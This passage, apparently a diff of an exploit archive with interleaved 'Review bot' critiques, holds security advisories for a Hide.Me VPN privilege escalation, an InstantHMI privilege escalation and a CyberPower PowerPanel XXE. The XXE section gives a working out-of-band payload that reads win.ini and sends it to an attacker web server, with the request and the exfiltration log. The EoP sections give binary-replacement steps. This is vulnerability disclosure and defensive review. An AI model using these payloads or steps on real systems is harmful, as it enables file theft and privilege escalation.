Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure


Severity Level:
================
Low


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
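Review bot: the "Vulnerability Type" says "Buffer Overflow DOS" and the details mention overwritten MMX registers, but what the dump actually shows is a read access violation inside msvcrt!memmove (`movdqa xmm0, xmmword ptr [esi]` with esi = 005d2000 unmapped) and 0x41 bytes in the xmm registers, i.e. memmove reading past the end of the source buffer; the advisory's own "Read Access Violation / Memory Corruption" line says as much, so the type should be stated as an out-of-bounds read, which also squares with the Low severity and the vendor's "stability issue" reply. In the exploit steps, "XXM" is a typo for XMM, and steps 1 and 2 should give the actual command used to create the 4096-byte .lgv file and how it is passed to logviewer.exe, otherwise the crash cannot be reproduced from the report.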
72
platforms/windows/local/40071.txt
Executable file
@ -0,0 +1,72 @@
Title: Hide.Me VPN Client - EoP: User to SYSTEM
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: eVenture
Product: Hide.Me VPN Client
Version: 1.2.4
Download link: https://hide.me/en/software/windows
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release

Installer Name: Hide.me-Setup-1.2.4.exe
MD5: e5e5e2fa2c9592660a180357c4482740
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034

- 1. Introduction: -
The installer automatically creates a folder named "hide.me VPN" under
c:\program files\ for the software.
No other location can be specified during installation.

The folder has insecure permissions allowing EVERYONE the WRITE permission.
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.

As the software is running one executable as service under SYSTEM
permissions an attacker could elevate from regular user to SYSTEM.

- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt to specify an installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe

Example:

C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
The highest permissions are reached by overwriting the service executable: vpnsvc.exe

However it is running at startup and can't be stopped by a non-privileged user.

As we can write to the directory we can rename all of the DLL's to DLL.old

C:\Program Files\hide.me VPN\Common.dll
C:\Program Files\hide.me VPN\SharpRaven.dll
C:\Program Files\hide.me VPN\ComLib.dll
C:\Program Files\hide.me VPN\vpnlib.dll
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
C:\Program Files\hide.me VPN\DotRas.dll

Once renamed, reboot the machine, log on as normal user.

E. Observe both application AND the system service have crashed.
Now replace vpnsvc.exe with a malicious copy.
Place back all original DLLS and reboot.

Our code will get executed under elevated permissions: SYSTEM.

- 3. Mitigation: -
A. set appropriate permissions on the application folder.

- 4. Author: -
sh4d0wman
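Review bot: the PoC steps are labelled A, B, C, C, E; the second "C" (overwriting the executable) should be D, and "DLL's" should read "DLLs". Mitigation A ("set appropriate permissions") should be concrete: the icacls listing shows the only non-inherited entry is `Everyone:(OI)(CI)(M)`, so the installer simply has to stop adding that ACE (the inherited Users (RX) and Administrators/SYSTEM (F) entries are already what a Program Files subfolder should have), and an administrator can repair an existing install with `icacls "C:\Program Files\hide.me VPN" /remove:g Everyone`. It is also worth stating that the attack window depends on the reboot-and-crash trick because vpnsvc.exe is locked while the SYSTEM service runs, which is why the weak ACL, not the service, is the thing to fix.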
|
56
platforms/windows/local/40072.txt
Executable file
56
platforms/windows/local/40072.txt
Executable file
|
@ -0,0 +1,56 @@
|
|||
Title: InstantHMI - EoP: User to ADMIN
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: Software Horizons
Product: InstantHMI
Version: 6.1
Download link: http://www.instanthmi.com/ihmisoftware.htm
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release

Installer Name: IHMI61-PCInstall-Unicode.exe
MD5: ee3ca3181c51387d89de19e89aea0b31
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f

- 1. Introduction: -
During a standard installation (default option) the installer
automatically creates a folder named "IHMI-6" in the root drive.
No other location can be specified during standard installation.

As this folder receives default permissions AUTHENTICATED USERS
are given the WRITE permission.

Because of this they can replace binaries or plant malicious
DLLs to obtain elevated, administrative level, privileges.

- 2. Technical Details/PoC: -
A. Obtain and execute the installer.

B. Observe there is no prompt for the installation location.

C. Review permissions under the Explorer Security tab or run icacls.exe

Example:

IHMI-6 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

D. Change the main executable: InstantHMI.exe with a malicious copy.

E. Once executed by an administrator our code will run
under administrator level privileges.

- 3. Mitigation: -
A. Install under "c:\program files" or "C:\Program Files (x86)"

B. set appropriate permissions on the application folder.

- 4. Author: -
sh4d0wman
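Review bot: The introduction says Authenticated Users are given the WRITE permission, but the icacls output in step C shows `NT AUTHORITY\Authenticated Users:(I)(M)`, i.e. Modify, which also includes delete; the text should say Modify so it matches the evidence. The `(I)` flag on every ACE shows these permissions are inherited from the drive root, which is the reason mitigation A works (a folder under Program Files inherits an ACL that gives Users read and execute only) and is worth stating, since otherwise A reads as an arbitrary preference. Step E should also say explicitly that exploitation needs an administrator to launch InstantHMI.exe, because that user-interaction precondition affects severity. Finally, the Date field `01/06/2016` is ambiguous between day-first and month-first; an ISO date would remove the doubt.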
135
platforms/xml/webapps/40077.txt
Executable file
@ -0,0 +1,135 @@
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval


Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition

Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.

Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.

================================================================

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------

94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }

---

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------

28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>

================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php


22.06.2016

--


C:\data\xxe.xml:
----------------

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">


Request:
--------

POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>



Response:
---------

C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
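Review bot: The Desc blames input that "is not sanitized", but the listing of splitInquirePayload shows the real defect on lines 99-101: `localUnmarshaller.unmarshal(paramInputStream)` hands the raw request body to JAXB, whose default underlying parser honours the DOCTYPE, fetches the external parameter entity and resolves the SYSTEM URIs it declares, which is exactly what the xxe.xml/Request/Response sequence demonstrates. Input sanitising is not the remedy; the servlet should parse with DTD support disabled (for example an XMLInputFactory with SUPPORT_DTD and IS_SUPPORTING_EXTERNAL_ENTITIES set to false, passing the resulting XMLStreamReader to unmarshal()), and the advisory has no mitigation section at all where this could be said. Two smaller points: web.xml maps the servlet to `/ppbe.xml` while the request targets `/client/ppbe.xml`, so a sentence naming the context path would help reproduction; and the SimpleHTTPServer log is also the detection signal worth calling out for defenders, an outbound GET from the PowerPanel host with file contents URL-encoded in the query string.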